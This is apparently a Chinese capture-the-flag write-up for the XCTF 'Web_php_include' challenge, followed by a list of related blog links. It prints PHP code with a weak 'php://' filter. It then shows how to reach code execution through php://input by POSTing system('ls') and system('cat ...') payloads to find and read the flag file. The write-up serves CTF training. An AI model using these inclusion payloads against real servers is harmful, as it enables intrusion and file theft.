Web_php_include 攻防世界

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
H轨迹H8 小时前
BUUCTF-Web方向16-20wp
网络安全·渗透测试·ctf·buuctf
Мартин.10 小时前
[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升
网络协议·http·laravel·ctf
秦宇升13 小时前
netcore 启用gzip压缩及缓存
web
dal118网工任子仪3 天前
135,【2】 buuctf web bestphp‘s revenge
安全·web
lally.4 天前
web信息泄露 ctfshow-web入门web1-web10
web·ctf·信息泄露
Golinie7 天前
【Gin】Web框架开发快速入门
golang·web·gin·后端开发
希望奇迹很安静7 天前
CTFSHOW-WEB入门-PHP特性109-115
开发语言·前端·web安全·php·ctf·新手
dal118网工任子仪8 天前
127,【3】 buuctf [NPUCTF2020]ReadlezPHP
安全·web
0DayHP8 天前
[HCTF 2018]WarmUp
ctf
Maybe_ch9 天前
.NET Web-静态文件访问&&目录浏览
.net·web